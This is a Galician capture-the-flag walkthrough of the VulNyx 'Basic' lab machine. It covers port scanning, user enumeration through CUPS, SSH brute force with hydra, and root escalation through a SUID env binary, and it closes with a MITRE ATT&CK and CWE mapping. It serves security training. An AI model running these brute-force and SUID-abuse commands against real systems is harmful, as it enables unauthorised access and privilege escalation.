Ir ao contido

Doc vulnyx basic

Máquina virtual Basic

Fig. VulNyx Basic
Fig. Card VulNyx Basic

A máquina Basic é moi interesante porque...

  • CUPS (porto 631) revela nome de usuario mediante impresoras
  • Brute-force SSH estándar
  • Escalada mediante binario SUID (env)
  • Técnica clásica de abuso de SUID

Diagrama de ataque

Fig. Diagrama de ataque

Fase 1 — Recopilación

sudo arp-scan --interface=eth1 192.168.56.0/24
ping -c2 IP_VulNyx_Basic -R # TTL ≃ 64 ⇒ GNU/Linux, TTL ≃ 128 ⇒ Microsoft Windows
sudo nmap -sS -Pn -T4 -p- -vvv --min-rate 5000 IP_VulNyx_Basic # 22,631
whatweb IP_VulNyx_Basic:631
curl -I IP_VulNyx_Basic:631

Fase 2 — Análise

# Porto 631 → CUPS (Common UNIX Printing System)
firefox http://IP_VulNyx_Basic:631 &

# Na interface de CUPS atopamos unha impresora
# Nome da impresora: XXXXXXXXX
# Usuario identificado: XXXXXXXXX

Fase 3 — Explotación

# Ataque de forza bruta SSH ao usuario XXXXXXXXX
hydra -l XXXXXXXXX -P /usr/share/wordlists/rockyou.txt IP_VulNyx_Basic ssh
# Contrasinal atopada para XXXXXXXXX

# Acceso SSH
ssh XXXXXXXXX@IP_VulNyx_Basic
# ⇒ Conseguimos consola de usuario XXXXXXXXX (flag user.txt)

Fase 4 — Post‑explotación

# Busca de binarios con permisos SUID
find / -type f -perm -4000 2>/dev/null | xargs ls -l

# Binario SUID identificado: /usr/bin/env

# Consulta en GTFOBins(https://gtfobins.github.io/) para env
# env con SUID permite executar comandos mantendo privilexios

# Explotación de env con SUID
/usr/bin/env /bin/bash -p
# ⇒ Conseguimos shell de root

# Verificación
whoami # root
id # uid=1000(XXXXXXXXX) gid=1000(XXXXXXXXX) euid=0(root) grupos=1000(XXXXXXXXX)
cd /root
cat root.txt # ⇒ Flag de root conseguida

Correspondencia de fases → MITRE ATT&CK — VulNyx: Basic

Fase Acción / Resumo Vector principal MITRE ATT&CK (IDs) CWE(s) (relevantes)
1. Recopilación Descubrimento de host e servizos expostos Scanning / descubrimento de servizos T1595 — Active Scanning
T1046 — Network Service Discovery		 CWE-200 — Information Exposure (reconnaissance)
2. Análise Identificación de usuario mediante servizo CUPS Information disclosure / user enumeration T1087 — Account Discovery
T1592 — Gather Victim Host Information		 CWE-200 — Information Exposure
3. Explotación Ataque de forza bruta SSH Brute-force de credenciais T1110.001 — Brute Force: Password Guessing
T1021.004 — Remote Services: SSH		 CWE-521 — Weak Password Requirements; CWE-307 — Improper Restriction of Excessive Authentication Attempts
4. Post-explotación Busca de binarios con permisos SUID Discovery local T1083 — File and Directory Discovery
T1068 — Exploitation for Privilege Escalation		 CWE-732 — Incorrect Permission Assignment for Critical Resource
Abuso de env con SUID para escalada de privilexios SUID binary exploitation T1548.001 — Abuse Elevation Control Mechanism: Setuid and Setgid
T1059.004 — Command and Scripting Interpreter: Unix Shell		 CWE-269 — Improper Privilege Management; CWE-732 — Incorrect Permission Assignment for Critical Resource